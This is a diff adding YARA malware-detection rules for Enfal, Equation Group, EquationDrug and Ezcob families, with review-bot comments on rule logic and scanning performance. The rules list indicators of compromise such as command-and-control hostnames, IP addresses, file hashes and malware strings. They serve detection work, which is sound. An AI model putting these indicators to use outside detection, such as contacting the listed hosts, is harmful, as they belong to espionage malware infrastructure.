+	strings:
+		// can be ascii or wide formatted - therefore no restriction
+		$c_xml      = "<?xml version="
+		$c_word     = "<?mso-application progid=\"Word.Document\"?>"
+		$c_macro    = "w:macrosPresent=\"yes\""
+		$c_binary   = "<w:binData w:name="
+		$c_0_chars  = "<o:Characters>0</o:Characters>"
+		$c_1_line   = "<o:Lines>1</o:Lines>"
+	condition:
+		all of ($c*)
+}
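Review bot: The comment "can be ascii or wide formatted - therefore no restriction" describes the opposite of what the strings do: a YARA text string with no modifier matches ASCII only, so a UTF-16 encoded XML document will not match `Dridex_Trojan_XML` at all. To get the behaviour the comment describes, add the modifiers explicitly, e.g. `$c_xml = "<?xml version=" ascii wide`, and likewise for the other five `$c_*` strings. The comment can then simply state that both encodings are covered.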
diff --git a/malware/Enfal.yar b/malware/Enfal.yar
new file mode 100644
index 0000000..2923587
--- /dev/null
+++ b/malware/Enfal.yar
@@ -0,0 +1,132 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+import "pe"
+
+rule EnfalCode : Enfal Family 
+{
+    meta:
+        description = "Enfal code tricks"
+        author = "Seth Hardy"
+        last_modified = "2014-06-19"
+        
+    strings:
+        // mov al, 20h; sub al, bl; add [ebx+esi], al; push esi; inc ebx; call edi; cmp ebx, eax
+        $decrypt = { B0 20 2A C3 00 04 33 56 43 FF D7 3B D8 }
+        
+    condition:
+        any of them
+}
+
+rule EnfalStrings : Enfal Family
+{
+    meta:
+        description = "Enfal Identifying Strings"
+        author = "Seth Hardy"
+        last_modified = "2014-06-19"
+        
+    strings:
+        $ = "D:\\work\\\xe6\xba\x90\xe5\x93\xa5\xe5\x85\x8d\xe6\x9d\x80\\tmp\\Release\\ServiceDll.pdb"
+        $ = "e:\\programs\\LuridDownLoader"
+        $ = "LuridDownloader for Falcon"
+        $ = "DllServiceTrojan"
+        $ = "\\k\\\xe6\xa1\x8c\xe8\x9d\xa2\\"
+        $ = "EtenFalcon\xef\xbc\x88\xe4\xbf\xae\xe6\x94\xb9\xef\xbc\x89"
+        $ = "Madonna\x00Jesus"
+        $ = "/iupw82/netstate"
+        $ = "fuckNodAgain"
+        $ = "iloudermao"
+        $ = "Crpq2.cgi"
+        $ = "Clnpp5.cgi"
+        $ = "Dqpq3ll.cgi"
+        $ = "dieosn83.cgi"
+        $ = "Rwpq1.cgi"
+        $ = "/Ccmwhite"
+        $ = "/Cmwhite"
+        $ = "/Crpwhite"
+        $ = "/Dfwhite"
+        $ = "/Query.txt"
+        $ = "/Ufwhite"
+        $ = "/cgl-bin/Clnpp5.cgi"
+        $ = "/cgl-bin/Crpq2.cgi"
+        $ = "/cgl-bin/Dwpq3ll.cgi"
+        $ = "/cgl-bin/Owpq4.cgi"
+        $ = "/cgl-bin/Rwpq1.cgi"
+        $ = "/trandocs/mm/"
+        $ = "/trandocs/netstat"
+        $ = "NFal.exe"
+        $ = "LINLINVMAN"
+        $ = "7NFP4R9W"
+        
+    condition:
+        any of them
+}
+
+rule Enfal : Family
+{
+    meta:
+        description = "Enfal"
+        author = "Seth Hardy"
+        last_modified = "2014-06-19"
+        
+    condition:
+        EnfalCode or EnfalStrings
+}
+
+
+rule Enfal_Malware {
+	meta:
+		description = "Detects a certain type of Enfal Malware"
+		author = "Florian Roth"
+		reference = "not set"
+		date = "2015/02/10"
+		hash = "9639ec9aca4011b2724d8e7ddd13db19913e3e16"
+		score = 60
+	strings:
+		$s0 = "POWERPNT.exe" fullword ascii
+		$s1 = "%APPDATA%\\Microsoft\\Windows\\" fullword ascii
+		$s2 = "%HOMEPATH%" fullword ascii
+		$s3 = "Server2008" fullword ascii
+		$s4 = "Server2003" fullword ascii
+		$s5 = "Server2003R2" fullword ascii
+		$s6 = "Server2008R2" fullword ascii
+		$s9 = "%HOMEDRIVE%" fullword ascii
+		$s13 = "%ComSpec%" fullword ascii
+	condition:
+		all of them
+}
+
+rule Enfal_Malware_Backdoor {
+	meta:
+		description = "Generic Rule to detect the Enfal Malware"
+		author = "Florian Roth"
+		date = "2015/02/10"
+		super_rule = 1
+		hash0 = "6d484daba3927fc0744b1bbd7981a56ebef95790"
+		hash1 = "d4071272cc1bf944e3867db299b3f5dce126f82b"
+		hash2 = "6c7c8b804cc76e2c208c6e3b6453cb134d01fa41"
+		score = 60
+	strings:
+		$mz = { 4d 5a }
+			
+		$x1 = "Micorsoft Corportation" fullword wide
+		$x2 = "IM Monnitor Service" fullword wide
+		
+		$s1 = "imemonsvc.dll" fullword wide
+		$s2 = "iphlpsvc.tmp" fullword
+		
+		$z1 = "urlmon" fullword
+		$z2 = "Registered trademarks and service marks are the property of their respec" wide		
+		$z3 = "XpsUnregisterServer" fullword
+		$z4 = "XpsRegisterServer" fullword
+		$z5 = "{53A4988C-F91F-4054-9076-220AC5EC03F3}" fullword
+	condition:
+		( $mz at 0 ) and 
+		( 
+			1 of ($x*) or 
+			( all of ($s*) and all of ($z*) )
+		)
+}
+
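Review bot: The two-byte `$mz = { 4d 5a }` anchor in `Enfal_Malware_Backdoor`, used only as `$mz at 0` in the condition, is a very short atom that the scanner has to verify at every occurrence of those bytes (recent yara versions warn that such strings slow down scanning); the idiomatic and cheaper form is to drop the string and test the header directly in the condition, `uint16(0) == 0x5A4D and ( 1 of ($x*) or ( all of ($s*) and all of ($z*) ) )`. The same `$mz` pattern (`"MZ"` or `{ 4d 5a }` plus `$mz at 0`) is repeated throughout Equation.yar and in F0xy.yar and would benefit from the same change. Separately, `Enfal_Malware` carries `reference = "not set"`, which reads as a placeholder; either supply the reference or remove the field so it is not taken for a citation. The anonymous `$ = ...` strings in `EnfalStrings` (and in `EzcobStrings` in Ezcob.yar) also make `yara -s` output hard to use for triage, since a hit cannot be attributed to a particular indicator; naming them is a cheap improvement.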
diff --git a/malware/Equation.yar b/malware/Equation.yar
new file mode 100644
index 0000000..f9164fb
--- /dev/null
+++ b/malware/Equation.yar
@@ -0,0 +1,573 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+import "pe"
+
+
+
+
+/* Equation APT ------------------------------------------------------------ */
+
+rule apt_equation_exploitlib_mutexes {
+    meta:
+        copyright = "Kaspersky Lab"
+        description = "Rule to detect Equation group's Exploitation library http://goo.gl/ivt8EW"
+        version = "1.0"
+        last_modified = "2015-02-16"
+        reference = "http://securelist.com/blog/research/68750/equation-the-death-star-of-malware-galaxy/"
+    strings:
+        $mz="MZ"
+        $a1="prkMtx" wide
+        $a2="cnFormSyncExFBC" wide
+        $a3="cnFormVoidFBC" wide
+        $a4="cnFormSyncExFBC"
+        $a5="cnFormVoidFBC"
+    condition:
+        (($mz at 0) and any of ($a*))
+}
+
+rule apt_equation_doublefantasy_genericresource {
+    meta:
+        copyright = "Kaspersky Lab"
+        description = "Rule to detect DoubleFantasy encoded config http://goo.gl/ivt8EW"
+        version = "1.0"
+        last_modified = "2015-02-16"
+        reference = "http://securelist.com/blog/research/68750/equation-the-death-star-of-malware-galaxy/"
+    strings:
+        $mz="MZ"
+        $a1={06 00 42 00 49 00 4E 00 52 00 45 00 53 00}
+        $a2="yyyyyyyyyyyyyyyy"
+        $a3="002"
+    condition:
+        (($mz at 0) and all of ($a*)) and filesize < 500000
+}
+
+rule apt_equation_equationlaser_runtimeclasses {
+	meta:
+	    copyright = "Kaspersky Lab"
+	    description = "Rule to detect the EquationLaser malware"
+	    version = "1.0"
+	    last_modified = "2015-02-16"
+	    reference = "https://securelist.com/blog/"
+	strings:
+	    $a1="?a73957838_2@@YAXXZ"
+	    $a2="?a84884@@YAXXZ"
+	    $a3="?b823838_9839@@YAXXZ"
+	    $a4="?e747383_94@@YAXXZ"
+	    $a5="?e83834@@YAXXZ"
+	    $a6="?e929348_827@@YAXXZ"
+	condition:
+	    any of them
+}
+
+rule apt_equation_cryptotable {
+	meta:
+	    copyright = "Kaspersky Lab"
+	    description = "Rule to detect the crypto library used in Equation group malware"
+	    version = "1.0"
+	    last_modified = "2015-02-16"
+	    reference = "https://securelist.com/blog/"
+	strings:
+	    $a={37 DF E8 B6 C7 9C 0B AE 91 EF F0 3B 90 C6 80 85 5D 19 4B 45 44 12 3C E2 0D 5C 1C 7B C4 FF D6 05 17 14 4F 03 74 1E 41 DA 8F 7D DE 7E 99 F1 35 AC B8 46 93 CE 23 82 07 EB 2B D4 72 71 40 F3 B0 F7 78 D7 4C D1 55 1A 39 83 18 FA E1 9A 56 B1 96 AB A6 30 C5 5F BE 0C 50 C1}
+	condition:
+	    $a
+}
+
+/* Equation Group - Kaspersky ---------------------------------------------- */
+
+rule Equation_Kaspersky_TripleFantasy_1 {
+	meta:
+		description = "Equation Group Malware - TripleFantasy http://goo.gl/ivt8EW"
+		author = "Florian Roth"
+		reference = "http://goo.gl/ivt8EW"
+		date = "2015/02/16"
+		hash = "b2b2cd9ca6f5864ef2ac6382b7b6374a9fb2cbe9"
+	strings:
+		$mz = { 4d 5a }
+
+		$s0 = "%SystemRoot%\\system32\\hnetcfg.dll" fullword wide
+		$s1 = "%WINDIR%\\System32\\ahlhcib.dll" fullword wide
+		$s2 = "%WINDIR%\\sjyntmv.dat" fullword wide
+		$s3 = "Global\\{8c38e4f3-591f-91cf-06a6-67b84d8a0102}" fullword wide
+		$s4 = "%WINDIR%\\System32\\owrwbsdi" fullword wide
+		$s5 = "Chrome" fullword wide
+		$s6 = "StringIndex" fullword ascii
+
+		$x1 = "itemagic.net@443" fullword wide
+		$x2 = "team4heat.net@443" fullword wide
+		$x5 = "62.216.152.69@443" fullword wide
+		$x6 = "84.233.205.37@443" fullword wide
+
+		$z1 = "www.microsoft.com@80" fullword wide
+		$z2 = "www.google.com@80" fullword wide
+		$z3 = "127.0.0.1:3128" fullword wide
+	condition:
+		( $mz at 0 ) and filesize < 300000 and
+		(
+			( all of ($s*) and all of ($z*) ) or
+			( all of ($s*) and 1 of ($x*) )
+		)
+}
+
+rule Equation_Kaspersky_DoubleFantasy_1 {
+	meta:
+		description = "Equation Group Malware - DoubleFantasy"
+		author = "Florian Roth"
+		reference = "http://goo.gl/ivt8EW"
+		date = "2015/02/16"
+		hash = "d09b4b6d3244ac382049736ca98d7de0c6787fa2"
+	strings:
+		$mz = { 4d 5a }
+
+		$z1 = "msvcp5%d.dll" fullword ascii
+
+		$s0 = "actxprxy.GetProxyDllInfo" fullword ascii
+		$s3 = "actxprxy.DllGetClassObject" fullword ascii
+		$s5 = "actxprxy.DllRegisterServer" fullword ascii
+		$s6 = "actxprxy.DllUnregisterServer" fullword ascii
+
+		$x1 = "yyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyy" ascii
+		$x2 = "191H1a1" fullword ascii
+		$x3 = "November " fullword ascii
+		$x4 = "abababababab" fullword ascii
+		$x5 = "January " fullword ascii
+		$x6 = "October " fullword ascii
+		$x7 = "September " fullword ascii
+	condition:
+		( $mz at 0 ) and filesize < 350000 and
+		(
+			( $z1 ) or
+			( all of ($s*) and 6 of ($x*) )
+		)
+}
+
+rule Equation_Kaspersky_GROK_Keylogger {
+	meta:
+		description = "Equation Group Malware - GROK keylogger"
+		author = "Florian Roth"
+		reference = "http://goo.gl/ivt8EW"
+		date = "2015/02/16"
+		hash = "50b8f125ed33233a545a1aac3c9d4bb6aa34b48f"
+	strings:
+		$mz = { 4d 5a }
+		$s0 = "c:\\users\\rmgree5\\" ascii
+		$s1 = "msrtdv.sys" fullword wide
+
+		$x1 = "svrg.pdb" fullword ascii
+		$x2 = "W32pServiceTable" fullword ascii
+		$x3 = "In forma" fullword ascii
+		$x4 = "ReleaseF" fullword ascii
+		$x5 = "criptor" fullword ascii
+		$x6 = "astMutex" fullword ascii
+		$x7 = "ARASATAU" fullword ascii
+		$x8 = "R0omp4ar" fullword ascii
+
+		$z1 = "H.text" fullword ascii
+		$z2 = "\\registry\\machine\\software\\Microsoft\\Windows NT\\CurrentVersion" fullword wide
+		$z4 = "\\registry\\machine\\SYSTEM\\ControlSet001\\Control\\Session Manager\\Environment" wide fullword
+	condition:
+		( $mz at 0 ) and filesize < 250000 and
+		(
+			$s0 or
+			( $s1 and 6 of ($x*) ) or
+			( 6 of ($x*) and all of ($z*) )
+		)
+}
+
+rule Equation_Kaspersky_GreyFishInstaller {
+	meta:
+		description = "Equation Group Malware - Grey Fish"
+		author = "Florian Roth"
+		reference = "http://goo.gl/ivt8EW"
+		date = "2015/02/16"
+		hash = "58d15d1581f32f36542f3e9fb4b1fc84d2a6ba35"
+	strings:
+		$s0 = "DOGROUND.exe" fullword wide
+		$s1 = "Windows Configuration Services" fullword wide
+		$s2 = "GetMappedFilenameW" fullword ascii
+	condition:
+		all of them
+}
+
+rule Equation_Kaspersky_EquationDrugInstaller {
+	meta:
+		description = "Equation Group Malware - EquationDrug installer LUTEUSOBSTOS"
+		author = "Florian Roth"
+		reference = "http://goo.gl/ivt8EW"
+		date = "2015/02/16"
+		hash = "61fab1b8451275c7fd580895d9c68e152ff46417"
+	strings:
+		$mz = { 4d 5a }
+
+		$s0 = "\\system32\\win32k.sys" fullword wide
+		$s1 = "ALL_FIREWALLS" fullword ascii
+
+		$x1 = "@prkMtx" fullword wide
+		$x2 = "STATIC" fullword wide
+		$x3 = "windir" fullword wide
+		$x4 = "cnFormVoidFBC" fullword wide
+		$x5 = "CcnFormSyncExFBC" fullword wide
+		$x6 = "WinStaObj" fullword wide
+		$x7 = "BINRES" fullword wide
+	condition:
+		( $mz at 0 ) and filesize < 500000 and all of ($s*) and 5 of ($x*)
+}
+
+rule Equation_Kaspersky_EquationLaserInstaller {
+	meta:
+		description = "Equation Group Malware - EquationLaser Installer"
+		author = "Florian Roth"
+		reference = "http://goo.gl/ivt8EW"
+		date = "2015/02/16"
+		hash = "5e1f56c1e57fbff96d4999db1fd6dd0f7d8221df"
+	strings:
+		$mz = { 4d 5a }
+		$s0 = "Failed to get Windows version" fullword ascii
+		$s1 = "lsasrv32.dll and lsass.exe" fullword wide
+		$s2 = "\\\\%s\\mailslot\\%s" fullword ascii
+		$s3 = "%d-%d-%d %d:%d:%d Z" fullword ascii
+		$s4 = "lsasrv32.dll" fullword ascii
+		$s5 = "!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!" fullword ascii
+		$s6 = "%s %02x %s" fullword ascii
+		$s7 = "VIEWERS" fullword ascii
+		$s8 = "5.2.3790.220 (srv03_gdr.040918-1552)" fullword wide
+	condition:
+		( $mz at 0 ) and filesize < 250000 and 6 of ($s*)
+}
+
+rule Equation_Kaspersky_FannyWorm {
+	meta:
+		description = "Equation Group Malware - Fanny Worm"
+		author = "Florian Roth"
+		reference = "http://goo.gl/ivt8EW"
+		date = "2015/02/16"
+		hash = "1f0ae54ac3f10d533013f74f48849de4e65817a7"
+	strings:
+		$mz = { 4d 5a }
+
+		$s1 = "x:\\fanny.bmp" fullword ascii
+		$s2 = "32.exe" fullword ascii
+		$s3 = "d:\\fanny.bmp" fullword ascii
+
+		$x1 = "c:\\windows\\system32\\kernel32.dll" fullword ascii
+		$x2 = "System\\CurrentControlSet\\Services\\USBSTOR\\Enum" fullword ascii
+		$x3 = "System\\CurrentControlSet\\Services\\PartMgr\\Enum" fullword ascii
+		$x4 = "\\system32\\win32k.sys" fullword wide
+		$x5 = "\\AGENTCPD.DLL" fullword ascii
+		$x6 = "agentcpd.dll" fullword ascii
+		$x7 = "PADupdate.exe" fullword ascii
+		$x8 = "dll_installer.dll" fullword ascii
+		$x9 = "\\restore\\" fullword ascii
+		$x10 = "Q:\\__?__.lnk" fullword ascii
+		$x11 = "Software\\Microsoft\\MSNetMng" fullword ascii
+		$x12 = "\\shelldoc.dll" fullword ascii
+		$x13 = "file size = %d bytes" fullword ascii
+		$x14 = "\\MSAgent" fullword ascii
+		$x15 = "Global\\RPCMutex" fullword ascii
+		$x16 = "Global\\DirectMarketing" fullword ascii
+	condition:
+		( $mz at 0 ) and filesize < 300000 and
+		(
+			( 2 of ($s*) ) or
+			( 1 of ($s*) and 6 of ($x*) ) or
+			( 14 of ($x*) )
+		)
+}
+
+rule Equation_Kaspersky_HDD_reprogramming_module {
+	meta:
+		description = "Equation Group Malware - HDD reprogramming module"
+		author = "Florian Roth"
+		reference = "http://goo.gl/ivt8EW"
+		date = "2015/02/16"
+		hash = "ff2b50f371eb26f22eb8a2118e9ab0e015081500"
+	strings:
+		$mz = { 4d 5a }
+		$s0 = "nls_933w.dll" fullword ascii
+
+		$s1 = "BINARY" fullword wide
+		$s2 = "KfAcquireSpinLock" fullword ascii
+		$s3 = "HAL.dll" fullword ascii
+		$s4 = "READ_REGISTER_UCHAR" fullword ascii
+	condition:
+		( $mz at 0 ) and filesize < 300000 and all of ($s*)
+}
+
+rule Equation_Kaspersky_EOP_Package {
+	meta:
+		description = "Equation Group Malware - EoP package and malware launcher"
+		author = "Florian Roth"
+		reference = "http://goo.gl/ivt8EW"
+		date = "2015/02/16"
+		hash = "2bd1b1f5b4384ce802d5d32d8c8fd3d1dc04b962"
+	strings:
+		$mz = { 4d 5a }
+		$s0 = "abababababab" fullword ascii
+		$s1 = "abcdefghijklmnopq" fullword ascii
+		$s2 = "@STATIC" fullword wide
+		$s3 = "$aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" fullword ascii
+		$s4 = "@prkMtx" fullword wide
+		$s5 = "prkMtx" fullword wide
+		$s6 = "cnFormVoidFBC" fullword wide
+	condition:
+		( $mz at 0 ) and filesize < 100000 and all of ($s*)
+}
+
+rule Equation_Kaspersky_TripleFantasy_Loader {
+	meta:
+		description = "Equation Group Malware - TripleFantasy Loader"
+		author = "Florian Roth"
+		reference = "http://goo.gl/ivt8EW"
+		date = "2015/02/16"
+		hash = "4ce6e77a11b443cc7cbe439b71bf39a39d3d7fa3"
+	strings:
+		$mz = { 4d 5a }
+
+		$x1 = "Original Innovations, LLC" fullword wide
+		$x2 = "Moniter Resource Protocol" fullword wide
+		$x3 = "ahlhcib.dll" fullword wide
+
+		$s0 = "hnetcfg.HNetGetSharingServicesPage" fullword ascii
+		$s1 = "hnetcfg.IcfGetOperationalMode" fullword ascii
+		$s2 = "hnetcfg.IcfGetDynamicFwPorts" fullword ascii
+		$s3 = "hnetcfg.HNetFreeFirewallLoggingSettings" fullword ascii
+		$s4 = "hnetcfg.HNetGetShareAndBridgeSettings" fullword ascii
+		$s5 = "hnetcfg.HNetGetFirewallSettingsPage" fullword ascii
+	condition:
+		( $mz at 0 ) and filesize < 50000 and ( all of ($x*) and all of ($s*) )
+}
+
+/* Rule generated from the mentioned keywords */
+
+rule Equation_Kaspersky_SuspiciousString {
+	meta:
+		description = "Equation Group Malware - suspicious string found in sample"
+		author = "Florian Roth"
+		reference = "http://goo.gl/ivt8EW"
+		date = "2015/02/17"
+		score = 60
+	strings:
+		$mz = { 4d 5a }
+
+		$s1 = "i386\\DesertWinterDriver.pdb" fullword
+		$s2 = "Performing UR-specific post-install..."
+		$s3 = "Timeout waiting for the \"canInstallNow\" event from the implant-specific EXE!"
+		$s4 = "STRAITSHOOTER30.exe"
+		$s5 = "standalonegrok_2.1.1.1"
+		$s6 = "c:\\users\\rmgree5\\"
+	condition:
+		( $mz at 0 ) and filesize < 500000 and all of ($s*)
+}
+
+/* EquationDrug Update 11.03.2015 - http://securelist.com/blog/research/69203/inside-the-equationdrug-espionage-platform/ */
+
+rule EquationDrug_NetworkSniffer1 {
+	meta:
+		description = "EquationDrug - Backdoor driven by network sniffer - mstcp32.sys, fat32.sys"
+		author = "Florian Roth @4nc4p"
+		reference = "http://securelist.com/blog/research/69203/inside-the-equationdrug-espionage-platform/"
+		date = "2015/03/11"
+		hash = "26e787997a338d8111d96c9a4c103cf8ff0201ce"
+	strings:
+		$s0 = "Microsoft(R) Windows (TM) Operating System" fullword wide
+		$s1 = "\\Registry\\User\\CurrentUser\\" fullword wide
+		$s3 = "sys\\mstcp32.dbg" fullword ascii
+		$s7 = "mstcp32.sys" fullword wide
+		$s8 = "p32.sys" fullword ascii
+		$s9 = "\\Device\\%ws_%ws" fullword wide
+		$s10 = "\\DosDevices\\%ws" fullword wide
+		$s11 = "\\Device\\%ws" fullword wide
+	condition:
+		all of them
+}
+
+rule EquationDrug_CompatLayer_UnilayDLL {
+	meta:
+		description = "EquationDrug - Unilay.DLL"
+		author = "Florian Roth @4nc4p"
+		reference = "http://securelist.com/blog/research/69203/inside-the-equationdrug-espionage-platform/"
+		date = "2015/03/11"
+		hash = "a3a31937956f161beba8acac35b96cb74241cd0f"
+	strings:
+		$mz = { 4d 5a }
+		$s0 = "unilay.dll" fullword ascii
+	condition:
+		( $mz at 0 ) and $s0
+}
+
+rule EquationDrug_HDDSSD_Op {
+	meta:
+		description = "EquationDrug - HDD/SSD firmware operation - nls_933w.dll"
+		author = "Florian Roth @4nc4p"
+		reference = "http://securelist.com/blog/research/69203/inside-the-equationdrug-espionage-platform/"
+		date = "2015/03/11"
+		hash = "ff2b50f371eb26f22eb8a2118e9ab0e015081500"
+	strings:
+		$s0 = "nls_933w.dll" fullword ascii
+	condition:
+		all of them
+}
+
+rule EquationDrug_NetworkSniffer2 {
+	meta:
+		description = "EquationDrug - Network Sniffer - tdip.sys"
+		author = "Florian Roth @4nc4p"
+		reference = "http://securelist.com/blog/research/69203/inside-the-equationdrug-espionage-platform/"
+		date = "2015/03/11"
+		hash = "7e3cd36875c0e5ccb076eb74855d627ae8d4627f"
+	strings:
+		$s0 = "Microsoft(R) Windows (TM) Operating System" fullword wide
+		$s1 = "IP Transport Driver" fullword wide
+		$s2 = "tdip.sys" fullword wide
+		$s3 = "sys\\tdip.dbg" fullword ascii
+		$s4 = "dip.sys" fullword ascii
+		$s5 = "\\Device\\%ws_%ws" fullword wide
+		$s6 = "\\DosDevices\\%ws" fullword wide
+		$s7 = "\\Device\\%ws" fullword wide
+	condition:
+		all of them
+}
+
+rule EquationDrug_NetworkSniffer3 {
+	meta:
+		description = "EquationDrug - Network Sniffer - tdip.sys"
+		author = "Florian Roth @4nc4p"
+		reference = "http://securelist.com/blog/research/69203/inside-the-equationdrug-espionage-platform/"
+		date = "2015/03/11"
+		hash = "14599516381a9646cd978cf962c4f92386371040"
+	strings:
+		$s0 = "Corporation. All rights reserved." fullword wide
+		$s1 = "IP Transport Driver" fullword wide
+		$s2 = "tdip.sys" fullword wide
+		$s3 = "tdip.pdb" fullword ascii
+	condition:
+		all of them
+}
+
+rule EquationDrug_VolRec_Driver {
+	meta:
+		description = "EquationDrug - Collector plugin for Volrec - msrstd.sys"
+		author = "Florian Roth @4nc4p"
+		reference = "http://securelist.com/blog/research/69203/inside-the-equationdrug-espionage-platform/"
+		date = "2015/03/11"
+		hash = "ee2b504ad502dc3fed62d6483d93d9b1221cdd6c"
+	strings:
+		$s0 = "msrstd.sys" fullword wide
+		$s1 = "msrstd.pdb" fullword ascii
+		$s2 = "msrstd driver" fullword wide
+	condition:
+		all of them
+}
+
+rule EquationDrug_KernelRootkit {
+	meta:
+		description = "EquationDrug - Kernel mode stage 0 and rootkit (Windows 2000 and above) - msndsrv.sys"
+		author = "Florian Roth @4nc4p"
+		reference = "http://securelist.com/blog/research/69203/inside-the-equationdrug-espionage-platform/"
+		date = "2015/03/11"
+		hash = "597715224249e9fb77dc733b2e4d507f0cc41af6"
+	strings:
+		$s0 = "Microsoft(R) Windows (TM) Operating System" fullword wide
+		$s1 = "Parmsndsrv.dbg" fullword ascii
+		$s2 = "\\Registry\\User\\CurrentUser\\" fullword wide
+		$s3 = "msndsrv.sys" fullword wide
+		$s5 = "\\REGISTRY\\MACHINE\\System\\CurrentControlSet\\Control\\Windows" fullword wide
+		$s6 = "\\Device\\%ws_%ws" fullword wide
+		$s7 = "\\DosDevices\\%ws" fullword wide
+		$s9 = "\\Device\\%ws" fullword wide
+	condition:
+		all of them
+}
+
+rule EquationDrug_Keylogger {
+	meta:
+		description = "EquationDrug - Key/clipboard logger driver - msrtvd.sys"
+		author = "Florian Roth @4nc4p"
+		reference = "http://securelist.com/blog/research/69203/inside-the-equationdrug-espionage-platform/"
+		date = "2015/03/11"
+		hash = "b93aa17b19575a6e4962d224c5801fb78e9a7bb5"
+	strings:
+		$s0 = "\\registry\\machine\\software\\Microsoft\\Windows NT\\CurrentVersion" fullword wide
+		$s2 = "\\registry\\machine\\SYSTEM\\ControlSet001\\Control\\Session Manager\\En" wide
+		$s3 = "\\DosDevices\\Gk" fullword wide
+		$s5 = "\\Device\\Gk0" fullword wide
+	condition:
+		all of them
+}
+
+rule EquationDrug_NetworkSniffer4 {
+	meta:
+		description = "EquationDrug - Network-sniffer/patcher - atmdkdrv.sys"
+		author = "Florian Roth @4nc4p"
+		reference = "http://securelist.com/blog/research/69203/inside-the-equationdrug-espionage-platform/"
+		date = "2015/03/11"
+		hash = "cace40965f8600a24a2457f7792efba3bd84d9ba"
+	strings:
+		$s0 = "Copyright 1999 RAVISENT Technologies Inc." fullword wide
+		$s1 = "\\systemroot\\" fullword ascii
+		$s2 = "RAVISENT Technologies Inc." fullword wide
+		$s3 = "Created by VIONA Development" fullword wide
+		$s4 = "\\Registry\\User\\CurrentUser\\" fullword wide
+		$s5 = "\\device\\harddiskvolume" fullword wide
+		$s7 = "ATMDKDRV.SYS" fullword wide
+		$s8 = "\\Device\\%ws_%ws" fullword wide
+		$s9 = "\\DosDevices\\%ws" fullword wide
+		$s10 = "CineMaster C 1.1 WDM Main Driver" fullword wide
+		$s11 = "\\Device\\%ws" fullword wide
+		$s13 = "CineMaster C 1.1 WDM" fullword wide
+	condition:
+		all of them
+}
+
+rule EquationDrug_PlatformOrchestrator {
+	meta:
+		description = "EquationDrug - Platform orchestrator - mscfg32.dll, svchost32.dll"
+		author = "Florian Roth @4nc4p"
+		reference = "http://securelist.com/blog/research/69203/inside-the-equationdrug-espionage-platform/"
+		date = "2015/03/11"
+		hash = "febc4f30786db7804008dc9bc1cebdc26993e240"
+	strings:
+		$s0 = "SERVICES.EXE" fullword wide
+		$s1 = "\\command.com" fullword wide
+		$s2 = "Microsoft(R) Windows (TM) Operating System" fullword wide
+		$s3 = "LSASS.EXE" fullword wide
+		$s4 = "Windows Configuration Services" fullword wide
+		$s8 = "unilay.dll" fullword ascii
+	condition:
+		all of them
+}
+
+rule EquationDrug_NetworkSniffer5 {
+	meta:
+		description = "EquationDrug - Network-sniffer/patcher - atmdkdrv.sys"
+		author = "Florian Roth @4nc4p"
+		reference = "http://securelist.com/blog/research/69203/inside-the-equationdrug-espionage-platform/"
+		date = "2015/03/11"
+		hash = "09399b9bd600d4516db37307a457bc55eedcbd17"
+	strings:
+		$s0 = "Microsoft(R) Windows (TM) Operating System" fullword wide
+		$s1 = "\\Registry\\User\\CurrentUser\\" fullword wide
+		$s2 = "atmdkdrv.sys" fullword wide
+		$s4 = "\\Device\\%ws_%ws" fullword wide
+		$s5 = "\\DosDevices\\%ws" fullword wide
+		$s6 = "\\Device\\%ws" fullword wide
+	condition:
+		all of them
+}
+
+rule EquationDrug_FileSystem_Filter {
+	meta:
+		description = "EquationDrug - Filesystem filter driver – volrec.sys, scsi2mgr.sys"
+		author = "Florian Roth @4nc4p"
+		reference = "http://securelist.com/blog/research/69203/inside-the-equationdrug-espionage-platform/"
+		date = "2015/03/11"
+		hash = "57fa4a1abbf39f4899ea76543ebd3688dcc11e13"
+	strings:
+		$s0 = "volrec.sys" fullword wide
+		$s1 = "volrec.pdb" fullword ascii
+		$s2 = "Volume recognizer driver" fullword wide
+	condition:
+		all of them
+}
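Review bot: `Equation_Kaspersky_SuspiciousString` requires `all of ($s*)`, yet its six strings come from unrelated components (a driver PDB path, installer log messages, an executable name, a user profile path) and its description speaks of a single suspicious string found in a sample, so the condition as written is unlikely ever to fire; `Equation_Kaspersky_GROK_Keylogger` in the same file already treats `$s0 = "c:\\users\\rmgree5\\"` alone as sufficient, which suggests `1 of ($s*)` was the intent here — worth confirming against the original rule before changing it. In addition, `EquationDrug_HDDSSD_Op` reduces to the single string `"nls_933w.dll"` with no header or size check, while `Equation_Kaspersky_HDD_reprogramming_module` covers the same sample hash with stricter criteria, so the looser rule mainly adds false-positive exposure; consider folding it into the stricter rule or giving it the `$mz at 0` and `filesize` guards its neighbours use.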
diff --git a/malware/Ezcob.yar b/malware/Ezcob.yar
new file mode 100644
index 0000000..79ba19e
--- /dev/null
+++ b/malware/Ezcob.yar
@@ -0,0 +1,35 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+import "pe"
+
+rule EzcobStrings : Ezcob Family
+{
+    meta:
+        description = "Ezcob Identifying Strings"
+        author = "Seth Hardy"
+        last_modified = "2014-06-23"
+        
+    strings:
+        $ = "\x12F\x12F\x129\x12E\x12A\x12E\x12B\x12A\x12-\x127\x127\x128\x123\x12"
+        $ = "\x121\x12D\x128\x123\x12B\x122\x12E\x128\x12-\x12B\x122\x123\x12D\x12"
+        $ = "Ezcob" wide ascii
+        $ = "l\x12i\x12u\x122\x120\x121\x123\x120\x124\x121\x126"
+        $ = "20110113144935"
+        
+    condition:
+       any of them
+}
+
+rule Ezcob : Family
+{
+    meta:
+        description = "Ezcob"
+        author = "Seth Hardy"
+        last_modified = "2014-06-23"
+        
+    condition:
+        EzcobStrings
+}
